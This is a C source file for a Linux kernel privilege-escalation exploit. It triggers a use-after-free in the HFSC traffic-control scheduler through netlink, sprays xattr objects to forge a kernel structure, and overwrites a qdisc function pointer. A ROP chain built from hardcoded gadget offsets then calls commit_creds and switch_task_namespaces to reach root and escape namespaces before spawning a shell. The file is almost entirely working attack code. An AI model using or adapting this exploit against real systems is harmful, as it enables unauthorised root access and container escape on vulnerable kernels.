#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sched.h>
#include <errno.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/if_arp.h>

#include "utils.h"

/* Prefetch kaslr leak */
#define MIN_STEXT 0xffffffff81000000
#define MAX_STEXT 0xffffffffbb000000
#define BASE_INC 0x1000000
#define SYS_GETUID 0x1a7440

/* simple_xattr spray */
#define XATTR_SPRAY 32
#define XATTR_HEADER_SIZE 32
#define XATTR_SLAB_LEN 1024
#define XATTR_DATA_LEN (XATTR_SLAB_LEN/2)

/* hfsc_class offsets */
#define LEVEL_OFFSET 100
#define CL_PARENT_OFFSET 112
#define VT_NODE_OFFSET 192
#define CF_NODE_OFFSET 224
#define CL_VT_OFFSET 280
#define CL_CVTMIN_OFFSET 312

/* Data offsets */
#define INIT_NSPROXY 0x26765c0
#define QFQ_CHANGE_QDISC_LOC 0x295d438

/* Function offsets */
#define PREPARE_KERNEL_CRED 0x1befb0
#define COMMIT_CREDS 0x1bed10
#define FIND_TASK_BY_VPID 0x1b5600
#define SWITCH_TASK_NAMESPACES 0x1bd180

/* Gadget offsets */
#define PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70 0xdf26ac
#define PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK 0x09e7eb
#define POP_RSP_POP_RBX_RET_THUNK 0x357c79
#define POP_RDI_RET_THUNK 0x088893
#define POP_RSI_RET_THUNK 0x0d88a3
#define POP_RDX_RET_THUNK 0x047e72
#define POP_RCX_RET_THUNK 0x0271ec
#define MOV_RDI_RAX_THUNK_RCX 0x817ea9
#define ADD_RAX_RCX_RET_THUNK 0x0d5f84
#define PUSH_RAX_JMP_RDX_THUNK 0x94dca7
#define POP_RSP_RET_THUNK 0x068961
#define MOV_RAX_R14_POP_R14_RET_THUNK 0xa210ac
#define POP_R14_RET_THUNK 0x0d88a2

#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0)

struct tf_msg {
    struct nlmsghdr nh;
    struct tcmsg tm;
#define TC_DATA_LEN 512
    char attrbuf[TC_DATA_LEN];
};

struct if_msg {
    struct nlmsghdr nh;
    struct ifinfomsg ifi;
};

/* Netlink message for setting loopback up. */
struct if_msg if_up_msg = {
    {
        .nlmsg_len = 32,
        .nlmsg_type = RTM_NEWLINK,
        .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
    },
    {
        .ifi_family = AF_UNSPEC,
        .ifi_type = ARPHRD_NETROM,
        .ifi_index = 1,
        .ifi_flags = IFF_UP,
        .ifi_change = 1,
    },

};


int xattr_fd;
char rop_buf[512];
char jop_buf[0x70];


// void init_rop (long *rop, long *jop, long kbase) {
//     *jop++ = 0xffffffffdeadbeef;
//     // /* restore rbx */
//     // *rop++ = kbase + PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK;
//     // *rop++ = 0;
//     // /* commit_creds(prepare_kernel_cred(0)) */
//     // *rop++ = kbase + POP_RDI_RET_THUNK;
//     // *rop++ = 0;
//     // *rop++ = kbase + PREPARE_KERNEL_CRED;
//     // *rop++ = kbase + POP_RCX_RET_THUNK;
//     // *rop++ = kbase + COMMIT_CREDS;
//     // *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX;
//     // /* switch_task_namespaces(find_task_by_vpid(1, init_ns_proxy) */
//     // *rop++ = kbase + POP_RDI_RET_THUNK;
//     // *rop++ = 1;
//     // *rop++ = kbase + FIND_TASK_BY_VPID;
//     // *rop++ = kbase + POP_RSI_RET_THUNK;
//     // *rop++ = kbase + INIT_NSPROXY;
//     // *rop++ = kbase + POP_RCX_RET_THUNK;
//     // *rop++ = kbase + SWITCH_TASK_NAMESPACES;
//     // *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX;
//     // /* return back to the original stack */
//     // *rop++ = kbase + MOV_RAX_R14_POP_R14_RET_THUNK;
//     // *rop++ = 0;
//     // *rop++ = kbase + POP_RDX_RET_THUNK;
//     // *rop++ = kbase + POP_R14_RET_THUNK;
//     // *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK;
//     // *rop++ = kbase + POP_RCX_RET_THUNK;
//     // *rop++ = (long)-384;
//     // *rop++ = kbase + ADD_RAX_RCX_RET_THUNK;
//     // *rop++ = kbase + POP_RDX_RET_THUNK;
//     // *rop++ = kbase + POP_RSP_RET_THUNK;
//     // *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK;
// }

/* Helper functions for creating rtnetlink messages. */

unsigned short add_rtattr (struct rtattr *rta, unsigned short type, unsigned short len, char *data) {
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    return rta->rta_len;
}

int vuln_class_id = 0x00010001; // 1:1, classid of vulnerable RSC parent.
int def_class_id = 0x00010002; // 1:2, classid where packets are enqueued.
struct tf_msg newqd_msg, delc_msg, new_rsc_msg, new_fsc_msg, new_qfq_qdisc;

void init_tf_msg (struct tf_msg *m) {
    m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    m->tm.tcm_family = PF_UNSPEC;
    m->tm.tcm_ifindex = if_nametoindex("lo");
    m->nh.nlmsg_len = NLMSG_LENGTH(sizeof(m->tm));
}

void init_qdisc_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWQDISC;
    m->tm.tcm_parent = -1;
    m->tm.tcm_handle = 1 << 16;
    m->nh.nlmsg_flags |= NLM_F_CREATE;
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc"));
    struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len);
    short def = 2;
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, 2, &def));
}


void init_rsc_class_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWTCLASS;
    m->tm.tcm_parent = 1 << 16;
    m->tm.tcm_handle = vuln_class_id;
    m->nh.nlmsg_flags |= NLM_F_CREATE;
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc"));
    struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len);
    opts->rta_type = TCA_OPTIONS;
    opts->rta_len = RTA_LENGTH(0);
    int rsc[3] = {1, 1, 1};
    opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_RSC, sizeof(rsc), rsc));
    m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
}

void init_fsc_class_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWTCLASS;
    m->tm.tcm_parent = vuln_class_id;
    m->tm.tcm_handle = def_class_id;
    m->nh.nlmsg_flags |= NLM_F_CREATE;
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc"));
    struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len);
    opts->rta_type = TCA_OPTIONS;
    opts->rta_len = RTA_LENGTH(0);
    int fsc[3] = {1, 1, 1};
    opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_FSC, sizeof(fsc), fsc));
    m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
}

void init_del_class_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    m->nh.nlmsg_type = RTM_DELTCLASS;
    m->tm.tcm_handle = vuln_class_id;
}

void init_qfq_qdisc_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWQDISC;
    m->tm.tcm_parent = 0x00010002;
    m->tm.tcm_handle = 2 << 16;
    m->nh.nlmsg_flags |= NLM_F_CREATE;
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(jop_buf), jop_buf));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(rop_buf), rop_buf));
}

void init_nl_msgs (void) {
    init_qdisc_msg(&newqd_msg);
    init_del_class_msg(&delc_msg);
    init_rsc_class_msg(&new_rsc_msg);
    init_fsc_class_msg(&new_fsc_msg);
}

/*
 * Send a Netlink message and check for error
 */
void netlink_write (int sock, struct tf_msg *m) {
    struct {
        struct nlmsghdr nh;
        struct nlmsgerr ne;
    } ack;
    if (write(sock, m, m->nh.nlmsg_len) == -1)
        err_exit("[-] write");
    if (read(sock , &ack, sizeof(ack)) == -1)
        err_exit("[-] read");
    if (ack.ne.error) {
        errno = -ack.ne.error;
        perror("[-] netlink");
    }
}

void netlink_write_noerr (int sock, struct tf_msg *m) {
    if (write(sock, m, m->nh.nlmsg_len) == -1)
        err_exit("[-] write");
}

/*
 * Allocate simple_xattr objects.
 */
int num_xattr = 0;
char xattr_buf[XATTR_DATA_LEN];
void spray_simple_xattrs(int num_spray) {
    char name[32];
    for (int i = 0; i < num_spray; i++, num_xattr++) {
        sprintf(name, "security.%d", num_xattr);
        if (fsetxattr(xattr_fd, name, xattr_buf, XATTR_DATA_LEN, 0) == -1)
            err_exit("[-] fsetxattr");
    }
}

/*
 * Send a message on the loopback device. Used to trigger qdisc enqueue and
 * dequeue functions.
 */
void loopback_send (void) {
    struct sockaddr iaddr = { AF_INET };
    int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
    if (inet_sock_fd == -1)
        err_exit("[-] inet socket");
    if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1)
        err_exit("[-] connect");
    if (write(inet_sock_fd, "", 1) == -1)
        err_exit("[-] inet write");
    close(inet_sock_fd);
}

uint64_t kernel_base, kernel_off = 0;

__attribute__ ((optimize(2)))
int orw_thread(void *args) {
    struct orw_thread_args *orw_args = (struct orw_thread_args *)args;
    int cpu = orw_args->cpu;
    void **spray_pgs = orw_args->spray_pgs;
    u64 guess = orw_args->guess;

    int start = orw_args->range_start;
    int end = orw_args->range_end;

    pin_cpu(cpu);

    printf("cpu: %d, spray_pgs: %p, guess: %lx\n", cpu, spray_pgs, guess );

    uint64_t pop_rsp_ret = 0xffffffff824006f2 + kernel_off; // pop rsp ; ret

    while (1) {
        for (int i = start; i < end; i++) {
            if (((u8 *)spray_pgs[i])[0x1ff8] == 0x2b || found != 0) {
                // found guess page, spam overwite
                if (found == 0) {
                    found = spray_pgs[i];
                }
                volatile u64 *full_chain_phys = (u64 *)(guess + 0x4000);

                // stack offset in syscall_enter_from_user_mode_prepare+0x6
                volatile u64 *stack_orw_target1 = (u64 *)(found + 0x01ee8+0x28);

                while (1) {
                    stack_orw_target1[0] = pop_rsp_ret;
                    stack_orw_target1[1] = (u64)full_chain_phys;
                }
            }
        }
    }

    return 0;
}

void spawn_orw_thread(int cpu, void *spray_pgs[], u64 guess, int start, int end) {
    void *stack = mmap(0, 0x4000, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0);
    struct orw_thread_args *args = malloc(sizeof(struct orw_thread_args));
    if (args == NULL) {
        perror("malloc");
        exit(1);
    }
    args->cpu = cpu;
    args->spray_pgs = spray_pgs;
    args->guess = guess;
    args->range_start = start;
    args->range_end = end;
    if (clone(orw_thread, stack + 0x4000, CLONE_VM, args) == -1) {
		perror("clone");
		exit(1);
	}
}

int main (int argc, char **argv) {

    pin_cpu(0);
    save_state();

    kernel_base = 0xffffffff81000000;
    kernel_off = kernel_base - MIN_STEXT;

    void *spray_pgs[128];
    for (int i = 0; i < 128; i ++) {
        spray_pgs[i] = allocate_huge_page();
        printf("spray_pgs[%d] : %p\n", i, spray_pgs[i]);
    }

    u64 guesses_start = 0xffff888104000000;
    u64 guess = (guesses_start + 3 * ((128<<21)/4)) & ~((1<<21)-1);
    printf("guess: %lx\n", guess);

    asm volatile("wrgsbase %0" :: "r" (guess) : "memory");

    spawn_orw_thread(1, spray_pgs, guess, 0, 128);

    usleep(1000);

    u64 gs_pivot_offset = 0x20c90;
    u64 gs_stack_addr = (u64)(guess + 0x2000);

    for (int i = 0; i < 128; i++) {
        *(u64 *)(spray_pgs[i] + gs_pivot_offset) = gs_stack_addr;
        *(u64 *)(spray_pgs[i] + 0x20cc0) = guess + 0x3000;
        *(u64 *)(spray_pgs[i] + 0x3000 + 0x560) = guess + 0x3000;
    }

    for (int i = 0; i < 128; i++) {
        u64 *full_chain_usr = spray_pgs[i] + 0x4000;
        int counter = 0;
        full_chain_usr[counter++] = kernel_off + 0xffffffff810021ea;//pop rdi; ret
        full_chain_usr[counter++] = 0x0;
        full_chain_usr[counter++] = kernel_off + 0xffffffff82141df1;
        /*
            0xffffffff82141df1 <__wrgsbase_inactive+33>: wrgsbase rdi
            0xffffffff82141df6 <__wrgsbase_inactive+38>: swapgs
            0xffffffff82141df9 <__wrgsbase_inactive+41>: ret
         */
        full_chain_usr[counter++] = kernel_off + 0xffffffff810021ea;//pop rdi; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff83676800;//init_cred
        full_chain_usr[counter++] = kernel_off + 0xffffffff811bed10;//commit_creds;

        full_chain_usr[counter++] = kernel_off + 0xffffffff810021ea;//pop rdi; ret
        full_chain_usr[counter++] = 1;
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x1b5600;//find_task_by_vpid
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x0d88a3; //pop rsi ; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x26765c0;//init_nsproxy

        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x0271ec; //pop rcx ; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x1bd180; //switch_task_namespaces
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x817ea9; //pop mov rdi, rax ; jmp rcx

        full_chain_usr[counter++] = kernel_off + 0xffffffff82201218;//swapgs; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff82201747;//iretq
        full_chain_usr[counter++] = (uint64_t)shell;
        full_chain_usr[counter++] = user_cs;
        full_chain_usr[counter++] = user_rflags;
        full_chain_usr[counter++] = user_rsp|8;
        full_chain_usr[counter++] = user_ss;
    }

    if (unshare(CLONE_NEWUSER) == -1)
        err_exit("[-] unshare(CLONE_NEWUSER)");
    if (unshare(CLONE_NEWNET) == -1)
        err_exit("[-] unshare(CLONE_NEWNET)");

    /* Open temporary file to use for xattr spray */
    xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
    if (xattr_fd == -1)
        err_exit("[-] open");

    /* Open socket to send netlink commands to */
    int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (nl_sock_fd == -1)
        err_exit("[-] nl socket");

    /* Set loopback device up */
    if_up_msg.ifi.ifi_index = if_nametoindex("lo");
    netlink_write(nl_sock_fd, &if_up_msg);

    init_nl_msgs();

    /* Trigger vuln */
    netlink_write(nl_sock_fd, &newqd_msg);
    netlink_write(nl_sock_fd, &new_rsc_msg);
    netlink_write(nl_sock_fd, &new_fsc_msg);
    loopback_send();
    delc_msg.tm.tcm_handle = def_class_id;
    netlink_write(nl_sock_fd, &delc_msg);

    printf("[*] Triggered vulnerability\n");

    /* Place fake hfsc_class in xattr */

    /* hfsc_class.level = 1 (must be non-zero) */
    xattr_buf[LEVEL_OFFSET - XATTR_HEADER_SIZE] = 1;
    /* hfsc_class.vt_node = 1 (must be odd) */
    xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
    /* hfsc_class.cf_node = 1 (must be odd) */
    xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
    /* hfsc_class.parent = &qfq_change_qdisc (write target)*/
    long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET;
    memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8);
    /* hfsc_class.cl_vt = jop_gadget (write value) */
    long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70;
    memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8);

    printf("[*] Spraying simple_xattrs...\n");
    /* Spray simple_xattrs */
    delc_msg.tm.tcm_handle = vuln_class_id;
    netlink_write(nl_sock_fd, &delc_msg);
    spray_simple_xattrs(XATTR_SPRAY);

    /* Create new default class and trigger enqueue/dequeue to overwrite
     * qfq_change_qdisc with jop gadget */
    new_fsc_msg.tm.tcm_parent = 1 << 16;
    netlink_write(nl_sock_fd, &new_fsc_msg);

    printf("[*] Overwriting function pointer\n");
    loopback_send();

    /* Prepare ROP chain at an offset of 4 bytes. With the 4-byte rtattr
    header it will be at an 8-byte offset from rsi, allowing it to be reached
    with `push rsi ; pop rsp ; pop rbx` for the stack pivot */
    // init_rop(rop_buf + 4, jop_buf, kernel_base);

    uint64_t entry_SYSCALL_compat = 0xffffffff82201800 + kernel_off;
    // uint64_t entry_SYSCALL_compat = 0xffffffffdeadbeef;
    *(uint64_t *)(jop_buf) = entry_SYSCALL_compat;

    /* Create QFQ qdisc */
    init_qfq_qdisc_msg(&new_qfq_qdisc);
    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);

    /* Call overwritten function pointer */
    printf("[*] Triggering ROP chain\n");
    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);

}
